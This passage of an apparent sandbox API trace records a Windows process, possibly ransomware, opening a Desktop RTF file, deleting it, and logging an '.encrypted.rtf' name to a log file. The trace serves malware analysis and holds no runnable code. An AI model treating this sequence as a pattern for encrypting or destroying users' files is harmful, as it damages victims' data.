0x7c2240 [0030.439] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0030.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0030.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0030.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0030.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.439] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.439] CharLowerBuffW (in: lpsz="byte[48045]", cchLength=0xb | out: lpsz="byte[48045]") returned 0xb [0030.439] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.439] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0030.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0030.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.439] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.439] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0030.440] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0030.440] FreeLibrary (hLibModule=0x76b40000) returned 1 [0030.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0030.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0030.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0030.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0030.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0030.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0030.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0030.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0030.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0030.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0030.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0030.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0030.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0030.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0030.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0030.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0030.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0030.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0030.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0030.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0030.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0030.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0030.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0030.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0030.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.440] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.440] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.441] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.441] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0030.441] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.441] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.441] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.441] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.441] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.441] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.441] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.441] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.441] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.441] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.441] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.441] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.441] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.441] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.441] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.441] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.441] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0030.441] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.441] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T2TLwD.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t2tlwd.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0030.442] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.442] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.442] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.442] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.442] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0030.442] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.442] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.442] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.442] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.442] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.442] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.442] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.442] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.443] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0030.443] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.443] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.443] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.443] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.443] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.443] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.443] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.443] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T2TLwD.rtf", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T2TLwD.rtf", lpFilePart=0x0) returned 0x30 [0030.443] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T2TLwD.rtf", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0c881f0, ftCreationTime.dwHighDateTime=0x1d5c219, ftLastAccessTime.dwLowDateTime=0x909c3920, ftLastAccessTime.dwHighDateTime=0x1d5be0c, ftLastWriteTime.dwLowDateTime=0x1208baa0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xbbad, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="T2TLwD.rtf", cAlternateFileName="")) returned 0x7c2240 [0030.443] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T2TLwD.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t2tlwd.rtf")) returned 1 [0030.445] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0c881f0, ftCreationTime.dwHighDateTime=0x1d5c219, ftLastAccessTime.dwLowDateTime=0x909c3920, ftLastAccessTime.dwHighDateTime=0x1d5be0c, ftLastWriteTime.dwLowDateTime=0x1208baa0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xbbad, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="T2TLwD.rtf", cAlternateFileName="")) returned 0 [0030.445] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0030.445] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.445] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0030.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0030.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0030.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0030.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0030.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0030.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0030.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0030.445] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0030.445] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0030.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0030.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.446] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0030.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0030.446] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0030.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0030.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0030.446] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0030.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0030.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0030.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0030.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0030.446] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0030.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0030.446] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0030.446] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.446] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0030.446] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.446] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0030.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0030.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0030.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.447] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0030.447] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x3ae, lpOverlapped=0x0) returned 1 [0030.447] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0030.447] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x3ae, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.447] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0030.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x89ffb8 | out: hHeap=0x770000) returned 1 [0030.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0030.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0030.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T2TLwD.encrypted.rtf\r\n", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0030.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3d) returned 0x7ab338 [0030.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T2TLwD.encrypted.rtf\r\n", cchWideChar=61, lpMultiByteStr=0x7ab338, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T2TLwD.encrypted.rtf\r\n", lpUsedDefaultChar=0x0) returned 61 [0030.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0030.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0030.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0030.447] WriteFile (in: hFile=0x128, lpBuffer=0x7ab380*, nNumberOfBytesToWrite=0x3c, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7ab380*, lpNumberOfBytesWritten=0x6aee3c*=0x3c, lpOverlapped=0x0) returned 1 [0030.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.447] CloseHandle (hObject=0x128) returned 1 [0030.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0030.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0030.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0030.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0030.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0030.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0030.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0030.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0030.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0030.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0030.449] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0030.449] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0030.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0030.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0030.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0030.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0030.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0030.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0030.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0030.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0030.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0030.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0030.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: 